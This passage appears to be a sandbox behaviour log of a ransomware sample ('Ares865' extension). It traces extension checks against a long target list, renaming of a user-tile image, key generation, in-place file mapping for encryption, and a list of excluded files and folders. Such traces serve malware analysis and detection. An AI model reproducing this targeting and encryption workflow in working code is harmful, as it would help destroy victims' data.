lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.261] lstrlenW (lpString="rar") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.261] lstrlenW (lpString="zip") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.261] lstrlenW (lpString="tgz") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.261] lstrlenW (lpString="vbox") returned 4 [0085.261] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.261] lstrlenW (lpString="vdi") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.261] lstrlenW (lpString="vhd") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.261] lstrlenW (lpString="vhdx") returned 4 [0085.261] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.261] lstrlenW (lpString="avhd") returned 4 [0085.261] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.261] lstrlenW (lpString="db") returned 2 [0085.261] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.261] lstrlenW (lpString="db2") returned 3 [0085.261] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.262] lstrlenW (lpString="db3") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.262] lstrlenW (lpString="dbf") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.262] lstrlenW (lpString="mdf") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.262] lstrlenW (lpString="mdb") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.262] lstrlenW (lpString="sql") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.262] lstrlenW (lpString="sqlite") returned 6 [0085.262] lstrcmpiW (lpString1="36.bmp", lpString2="sqlite") returned -1 [0085.262] lstrlenW (lpString="sqlite3") returned 7 [0085.262] lstrcmpiW (lpString1="e36.bmp", lpString2="sqlite3") returned -1 [0085.262] lstrlenW (lpString="sqlitedb") returned 8 [0085.262] lstrcmpiW (lpString1="le36.bmp", lpString2="sqlitedb") returned -1 [0085.262] lstrlenW (lpString="xml") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.262] lstrlenW (lpString="$er") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.262] lstrlenW (lpString="4dd") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.262] lstrlenW (lpString="4dl") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.262] lstrlenW (lpString="^^^") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.262] lstrlenW (lpString="abs") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.262] lstrlenW (lpString="abx") returned 3 [0085.262] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.262] lstrlenW (lpString="accdb") returned 5 [0085.262] lstrcmpiW (lpString1="6.bmp", lpString2="accdb") returned -1 [0085.262] lstrlenW (lpString="accdc") returned 5 [0085.262] lstrcmpiW (lpString1="6.bmp", lpString2="accdc") returned -1 [0085.262] lstrlenW (lpString="accde") returned 5 [0085.262] lstrcmpiW (lpString1="6.bmp", lpString2="accde") returned -1 [0085.262] lstrlenW (lpString="accdr") returned 5 [0085.263] lstrcmpiW (lpString1="6.bmp", lpString2="accdr") returned -1 [0085.263] lstrlenW (lpString="accdt") returned 5 [0085.263] lstrcmpiW (lpString1="6.bmp", lpString2="accdt") returned -1 [0085.263] lstrlenW (lpString="accdw") returned 5 [0085.263] lstrcmpiW (lpString1="6.bmp", lpString2="accdw") returned -1 [0085.263] lstrlenW (lpString="accft") returned 5 [0085.263] lstrcmpiW (lpString1="6.bmp", lpString2="accft") returned -1 [0085.263] lstrlenW (lpString="adb") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.263] lstrlenW (lpString="adb") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.263] lstrlenW (lpString="ade") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.263] lstrlenW (lpString="adf") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.263] lstrlenW (lpString="adn") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.263] lstrlenW (lpString="adp") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.263] lstrlenW (lpString="alf") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.263] lstrlenW (lpString="ask") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.263] lstrlenW (lpString="btr") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.263] lstrlenW (lpString="cat") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.263] lstrlenW (lpString="cdb") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.263] lstrlenW (lpString="ckp") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.263] lstrlenW (lpString="cma") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.263] lstrlenW (lpString="cpd") returned 3 [0085.263] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.263] lstrlenW (lpString="dacpac") returned 6 [0085.264] lstrcmpiW (lpString1="36.bmp", lpString2="dacpac") returned -1 [0085.264] lstrlenW (lpString="dad") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.264] lstrlenW (lpString="dadiagrams") returned 10 [0085.264] lstrcmpiW (lpString1="tile36.bmp", lpString2="dadiagrams") returned 1 [0085.264] lstrlenW (lpString="daschema") returned 8 [0085.264] lstrcmpiW (lpString1="le36.bmp", lpString2="daschema") returned 1 [0085.264] lstrlenW (lpString="db-journal") returned 10 [0085.264] lstrcmpiW (lpString1="tile36.bmp", lpString2="db-journal") returned 1 [0085.264] lstrlenW (lpString="db-shm") returned 6 [0085.264] lstrcmpiW (lpString1="36.bmp", lpString2="db-shm") returned -1 [0085.264] lstrlenW (lpString="db-wal") returned 6 [0085.264] lstrcmpiW (lpString1="36.bmp", lpString2="db-wal") returned -1 [0085.264] lstrlenW (lpString="dbc") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.264] lstrlenW (lpString="dbs") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.264] lstrlenW (lpString="dbt") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.264] lstrlenW (lpString="dbv") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.264] lstrlenW (lpString="dbx") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.264] lstrlenW (lpString="dcb") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.264] lstrlenW (lpString="dct") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.264] lstrlenW (lpString="dcx") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.264] lstrlenW (lpString="ddl") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.264] lstrlenW (lpString="dlis") returned 4 [0085.264] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.264] lstrlenW (lpString="dp1") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.264] lstrlenW (lpString="dqy") returned 3 [0085.264] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.264] lstrlenW (lpString="dsk") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.265] lstrlenW (lpString="dsn") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.265] lstrlenW (lpString="dtsx") returned 4 [0085.265] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.265] lstrlenW (lpString="dxl") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.265] lstrlenW (lpString="eco") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.265] lstrlenW (lpString="ecx") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.265] lstrlenW (lpString="edb") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.265] lstrlenW (lpString="epim") returned 4 [0085.265] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.265] lstrlenW (lpString="fcd") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.265] lstrlenW (lpString="fdb") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.265] lstrlenW (lpString="fic") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.265] lstrlenW (lpString="flexolibrary") returned 12 [0085.265] lstrcmpiW (lpString1="ertile36.bmp", lpString2="flexolibrary") returned -1 [0085.265] lstrlenW (lpString="fm5") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.265] lstrlenW (lpString="fmp") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.265] lstrlenW (lpString="fmp12") returned 5 [0085.265] lstrcmpiW (lpString1="6.bmp", lpString2="fmp12") returned -1 [0085.265] lstrlenW (lpString="fmpsl") returned 5 [0085.265] lstrcmpiW (lpString1="6.bmp", lpString2="fmpsl") returned -1 [0085.265] lstrlenW (lpString="fol") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.265] lstrlenW (lpString="fp3") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.265] lstrlenW (lpString="fp4") returned 3 [0085.265] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.266] lstrlenW (lpString="fp5") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.266] lstrlenW (lpString="fp7") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.266] lstrlenW (lpString="fpt") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.266] lstrlenW (lpString="frm") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.266] lstrlenW (lpString="gdb") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.266] lstrlenW (lpString="gdb") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.266] lstrlenW (lpString="grdb") returned 4 [0085.266] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.266] lstrlenW (lpString="gwi") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.266] lstrlenW (lpString="hdb") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.266] lstrlenW (lpString="his") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.266] lstrlenW (lpString="ib") returned 2 [0085.266] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.266] lstrlenW (lpString="idb") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.266] lstrlenW (lpString="ihx") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.266] lstrlenW (lpString="itdb") returned 4 [0085.266] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.266] lstrlenW (lpString="itw") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.266] lstrlenW (lpString="jet") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.266] lstrlenW (lpString="jtx") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.266] lstrlenW (lpString="kdb") returned 3 [0085.266] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.266] lstrlenW (lpString="kexi") returned 4 [0085.266] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.267] lstrlenW (lpString="kexic") returned 5 [0085.267] lstrcmpiW (lpString1="6.bmp", lpString2="kexic") returned -1 [0085.267] lstrlenW (lpString="kexis") returned 5 [0085.267] lstrcmpiW (lpString1="6.bmp", lpString2="kexis") returned -1 [0085.267] lstrlenW (lpString="lgc") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.267] lstrlenW (lpString="lwx") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.267] lstrlenW (lpString="maf") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.267] lstrlenW (lpString="maq") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.267] lstrlenW (lpString="mar") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.267] lstrlenW (lpString="marshal") returned 7 [0085.267] lstrcmpiW (lpString1="e36.bmp", lpString2="marshal") returned -1 [0085.267] lstrlenW (lpString="mas") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.267] lstrlenW (lpString="mav") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.267] lstrlenW (lpString="maw") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.267] lstrlenW (lpString="mdbhtml") returned 7 [0085.267] lstrcmpiW (lpString1="e36.bmp", lpString2="mdbhtml") returned -1 [0085.267] lstrlenW (lpString="mdn") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.267] lstrlenW (lpString="mdt") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.267] lstrlenW (lpString="mfd") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.267] lstrlenW (lpString="mpd") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.267] lstrlenW (lpString="mrg") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.267] lstrlenW (lpString="mud") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.267] lstrlenW (lpString="mwb") returned 3 [0085.267] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.268] lstrlenW (lpString="myd") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.268] lstrlenW (lpString="ndf") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.268] lstrlenW (lpString="nnt") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.268] lstrlenW (lpString="nrmlib") returned 6 [0085.268] lstrcmpiW (lpString1="36.bmp", lpString2="nrmlib") returned -1 [0085.268] lstrlenW (lpString="ns2") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.268] lstrlenW (lpString="ns3") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.268] lstrlenW (lpString="ns4") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.268] lstrlenW (lpString="nsf") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.268] lstrlenW (lpString="nv") returned 2 [0085.268] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.268] lstrlenW (lpString="nv2") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.268] lstrlenW (lpString="nwdb") returned 4 [0085.268] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.268] lstrlenW (lpString="nyf") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.268] lstrlenW (lpString="odb") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.268] lstrlenW (lpString="odb") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.268] lstrlenW (lpString="oqy") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.268] lstrlenW (lpString="ora") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.268] lstrlenW (lpString="orx") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.268] lstrlenW (lpString="owc") returned 3 [0085.268] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.268] lstrlenW (lpString="p96") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.269] lstrlenW (lpString="p97") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.269] lstrlenW (lpString="pan") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.269] lstrlenW (lpString="pdb") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.269] lstrlenW (lpString="pdm") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.269] lstrlenW (lpString="pnz") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.269] lstrlenW (lpString="qry") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.269] lstrlenW (lpString="qvd") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.269] lstrlenW (lpString="rbf") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.269] lstrlenW (lpString="rctd") returned 4 [0085.269] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.269] lstrlenW (lpString="rod") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.269] lstrlenW (lpString="rodx") returned 4 [0085.269] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.269] lstrlenW (lpString="rpd") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.269] lstrlenW (lpString="rsd") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.269] lstrlenW (lpString="sas7bdat") returned 8 [0085.269] lstrcmpiW (lpString1="le36.bmp", lpString2="sas7bdat") returned -1 [0085.269] lstrlenW (lpString="sbf") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.269] lstrlenW (lpString="scx") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.269] lstrlenW (lpString="sdb") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.269] lstrlenW (lpString="sdc") returned 3 [0085.269] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.269] lstrlenW (lpString="sdf") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.270] lstrlenW (lpString="sis") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.270] lstrlenW (lpString="spq") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.270] lstrlenW (lpString="te") returned 2 [0085.270] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.270] lstrlenW (lpString="teacher") returned 7 [0085.270] lstrcmpiW (lpString1="e36.bmp", lpString2="teacher") returned -1 [0085.270] lstrlenW (lpString="tmd") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.270] lstrlenW (lpString="tps") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.270] lstrlenW (lpString="trc") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.270] lstrlenW (lpString="trc") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.270] lstrlenW (lpString="trm") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.270] lstrlenW (lpString="udb") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.270] lstrlenW (lpString="udl") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.270] lstrlenW (lpString="usr") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.270] lstrlenW (lpString="v12") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.270] lstrlenW (lpString="vis") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.270] lstrlenW (lpString="vpd") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.270] lstrlenW (lpString="vvv") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0085.270] lstrlenW (lpString="wdb") returned 3 [0085.270] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0085.270] lstrlenW (lpString="wmdb") returned 4 [0085.270] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0085.271] lstrlenW (lpString="wrk") returned 3 [0085.271] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0085.271] lstrlenW (lpString="xdb") returned 3 [0085.271] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0085.271] lstrlenW (lpString="xld") returned 3 [0085.271] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0085.271] lstrlenW (lpString="xmlff") returned 5 [0085.271] lstrcmpiW (lpString1="6.bmp", lpString2="xmlff") returned -1 [0085.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.Ares865") returned 90 [0085.271] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.ares865"), dwFlags=0x1) returned 1 [0085.272] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.272] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.272] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.272] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.273] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.273] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.273] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.275] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.280] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.280] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.280] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.280] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.280] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.281] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.281] CloseHandle (hObject=0x15c) returned 1 [0085.281] CloseHandle (hObject=0x118) returned 1 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.281] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.282] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddb6c46b, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile37.bmp", cAlternateFileName="")) returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="aoldtz.exe") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2=".") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="..") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="windows") returned -1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="bootmgr") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="temp") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="pagefile.sys") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="boot") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="ids.txt") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="ntuser.dat") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="perflogs") returned 1 [0085.282] lstrcmpiW (lpString1="usertile37.bmp", lpString2="MSBuild") returned 1 [0085.282] lstrlenW (lpString="usertile37.bmp") returned 14 [0085.282] lstrlenW (lpString="C:\\Users\\All 